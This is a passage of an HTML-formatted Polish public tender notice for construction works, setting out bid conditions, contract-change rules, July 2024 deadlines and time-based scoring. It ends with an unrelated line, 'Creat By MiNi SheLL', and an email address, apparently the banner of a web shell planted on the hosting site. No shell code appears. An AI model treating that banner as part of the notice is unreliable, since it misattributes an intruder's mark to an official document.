wyłącznie komputerowo na podstawie przedmiarów robót (wg Załącznik nr 1 do SWZ w układzie zgodnym z przedmiarami robót dla każdej z lokalizacji) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Oświadczenie o braku podstaw do wykluczenia oraz spełnianiu warunków udziału w postępowaniu - złożone na<br/> formularzu zgodnym ze wzorem stanowiącym Załącznik nr 4 do SWZ.<br/> 2) W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie o<br/> którym mowa w pkt. 1) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te<br/> potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/> Wykonawców wykazuje spełnianie warunków udziału postępowaniu oraz brak podstaw wykluczenia.<br/> 3) Pełnomocnictwo – wymagane, jeżeli ofertę w postępowaniu składa w imieniu Wykonawcy pełnomocnik. Wykonawcy<br/> wspólnie ubiegający się o zamówienie zobowiązani są załączyć do oferty pełnomocnictwo do reprezentowania ich w<br/> postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/> publicznego.<br/> 4). Pełnomocnictwo do złożenia oferty składa się w oryginale w takiej samej formie, jak składana oferta (tj. w formie<br/> elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także<br/> złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w<br/> formiemelektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 roku – Prawo<br/> omnotariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też<br/> poprzezmopatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem,<br/> podpisem<br/> zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość zmiany Umowy w zakresie i na określonych poniżej warunkach:<br/> 1) Zmiany w zakresie Wynagrodzenia: <br/>a) w przypadku wystąpienia zmian technologicznych, o których mowa w pkt 3 poniżej, <br/>b) zmiany stawki podatku VAT na przedmiot zamówienia (lub poszczególne jednostki) o wartość wynikającą ze zmienionej<br/> stawki VAT pod warunkiem, że jej zmiana nie była opublikowana w Dzienniku Urzędowym Rzeczpospolitej Polskiej przed<br/> złożeniem oferty przez Wykonawcę.<br/> 2) Zmiany terminu wykonania Przedmiotu umowy: <br/>a) z powodu wystąpienia Siły wyższej na zasadach określonych w §18 Umowy,<br/> b) będących następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający,<br/> c) w przypadku konieczności przerwy w pracach ziemnych lub innych pracach dla których technologia określona normami i<br/> przepisami uniemożliwiają wykonanie prac spowodowanej niesprzyjającymi warunkami atmosferycznymi,<br/> d) w przypadku zidentyfikowania niezinwentaryzowanego uzbrojenia podziemnego z tym, że decyzja taka w powyższych<br/> przypadkach leży wyłącznie po stronie Zamawiającego. Okoliczność taka musi zostać potwierdzona stosownym protokołem.<br/> Termin wykonania zamówienia zostanie przesunięty o taką ilość dni w jakiej występowały przerwy i nie można było<br/> realizować przedmiotu umowy,<br/> e) w przypadku konieczności wykonania robót dodatkowych nieobjętych przedmiotem umowy, a niezbędnych dla<br/> prawidłowego wykonania Zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej<br/> wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia – termin wykonania przedmiotu umowy<br/> zostanie wydłużony o okres równy okresowi realizacji robót nieobjętych niniejszą umową,<br/> 3) Zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:<br/> a) zaprzestaniem produkcji urządzeń lub materiałów, bądź czasowy brak ich dostępności na rynku ( min. 1 miesiąc lub<br/> trwały ),<br/> b) pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na poniesienie niższych kosztów<br/> realizacji Przedmiotu umowy lub kosztów eksploatacji wykonanego Przedmiotu umowy lub umożliwiających uzyskanie<br/> lepszej jakości robót, <br/>c) zmianą decyzji, postanowień lub uzgodnień przez organy administracyjne i podmioty uzgadniające dokumentacje<br/> projektową, <br/>d) koniecznością zrealizowania Przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze<br/> względu na zmiany obowiązującego prawa, <br/>e) koniecznością zrealizowania robót oraz usunięcia wad w celu zmniejszenia zagrożenia, gdy zaistnieje wypadek<br/> wpływający na bezpieczeństwo życia, zdrowia, mienia lub robót na terenie budowy, lub sąsiadujących nieruchomości a<br/> Inspektor Nadzoru wydał Wykonawcy polecenie wykonania robót, usunięcia wad lub podjęcia innych czynności w celu<br/> wyeliminowania lub zmniejszenia zagrożenia. <br/>Szczegółowy zakres prac zamiennych musi zostać udokumentowany.<br/> 4) Pozostałe zmiany Umowy spowodowane zmianą terminów bądź wartości poszczególnych elementów wynikłych w trakcie<br/> realizacji Przedmiotu umowy pod warunkiem, że zmiany te nie wpływają na zmianę terminu, o którym mowa w § 2 Umowy<br/> lub nie wpływają na zwiększenie Wynagrodzenia Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-04 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest do wykonywania zamówienia w terminie zadeklarowanym w ofercie jednak nie dłuższym niż<br/> 130 dni kalendarzowych od dnia podpisania umowy.<br/> Przy obliczaniu liczby punktów w kryterium termin wykonania robót Zamawiający zastosuje następujące wyliczenia:<br/> za wskazanie max. terminu wykonania robót do 110 dni kalendarzowych od dnia podpisania umowy - 100 pkt<br/> za wskazanie terminu wykonania robót w terminie od 111 dni do 120 dni kalendarzowych od podpisania umowy - 50 pkt<br/> za wskazanie terminu wykonania robót w terminie powyżej 121 dni do 130 dni kalendarzowych od podpisania umowy - 0 pkt<br/> Wykonawca, który nie zadeklaruje w formularzu ofertowym terminu wykonania lub zadeklaruje termin wynoszący powyżej<br/> 120 dni kalendarzowych do 130 dni kalendarzowych otrzyma zero punktów a Zamawiający przyjmie, iż termin wykonania<br/> robót wyniesie maksymalnie 130 dni kalendarzowych od dnia podpisania umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com